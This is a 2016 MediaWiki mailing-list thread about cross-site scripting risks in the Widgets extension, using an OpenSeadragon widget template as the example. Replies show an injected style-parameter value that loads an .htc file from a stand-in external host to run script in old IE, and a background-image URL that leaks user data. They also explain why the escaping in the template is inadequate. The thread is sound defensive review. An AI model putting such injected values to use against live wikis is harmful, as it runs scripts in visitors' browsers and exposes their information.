[MediaWiki-l] Security of widgets? Way to limit parameters? OpenSeadragon

Daniel Friesen daniel at nadir-seen-fire.com
Sat Oct 29 23:14:55 UTC 2016

On 2016-10-29 8:40 AM, Brian Wolff wrote:
> On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
> <michael at librepathology.org> wrote:
>> Hello,
>> I was wondering about the security of Widgets  (
>> https://www.mediawiki.org/wiki/Extension:Widgets )  that get parameters
>> passed to them. Any thoughts?
>> Are the parameters passed through to the widget cleansed of html/scripts?
>> If it isn't -- is it possible to easily enforce typing/boundaries on the
>> parameters?
There is no way to abstractly ensure scripts are cleaned from text. If
you know exactly where it is going you may be able to escape everything.
But you cannot target scripting explicitly and expect to clean it up, as
there are numerous tricks that can be used to bypass anything but the
strictest of escaping:

>> Create page: Widget:OpenSeadragon
>> ---------------------------------------------------------------------
>> <noinclude>__NOTOC__
>> <!-- Copyright (c) 2016 Michael Bonert -->
>> <!-- Released under GNU General Public Licence - Version 3; see
>> http://www.gnu.org/licenses/gpl.html -->
>> To insert this widget, use the following code:
>> <nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
>> |image=12881.dzi
>> |width=800
>> |height=600
>> }}</nowiki>
>> </noinclude>
>> <includeonly><!-- This inserts an OpenSeadragon image -->
>> <div id="openseadragon1" style="width:
>> <!--{$width|default:400|escape:'html'}-->px; height:
>> <!--{$height|default:300|escape:'html'}-->px;"></div>
>> <script src="../../openseadragon/openseadragon.min.js"></script>
>> <script type="text/javascript">
>>     var viewer = OpenSeadragon({
>>         id: "openseadragon1",
>>         prefixUrl: "../../openseadragon/images/",
>>         tileSources: "../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
>>     });
>> </script>
>> </includeonly>
>> -------------------------------------------------
> In theory that's what the escape modifier is for in smarty parameters.
> However, in this example, <!--{$width|default:400|escape:'html'}-->px;
> inside a style attribute isn't really sufficient, as a user could set
> a width parameter like "400; behavior: url(
> 'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
> execution on IE9 and older. (There are other properties for other
> browsers, however mostly affecting only older browsers). You could
> also leak private info about your users by doing something like
> background-image: url( "http://external.com/foo.png" ) .
> [Disclaimer: I have not read the source code of the widgets extension,
> so there could also potentially be generic security issues with the
> extension. Since I haven't reviewed it, I don't really know].
> --
> bawolff
And then there is $image. urlpathinfo doesn't escape quotes,
backslashes, or </script>.

Quite simply just about every Widget that embeds a string into a
<script> tag is vulnerable because Smarty does not give easy access to
the type of escaping you need to do to make text safe for a <script> tag
(generally the safest method is to just JSON.stringify the whole string
and make sure to escape </script>; though there's a chance that even
that isn't enough).

And then there are the few widgets that don't even do any escaping at
all; rather than just don't do enough escaping.

~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://danielfriesen.name/]

More information about the MediaWiki-l mailing list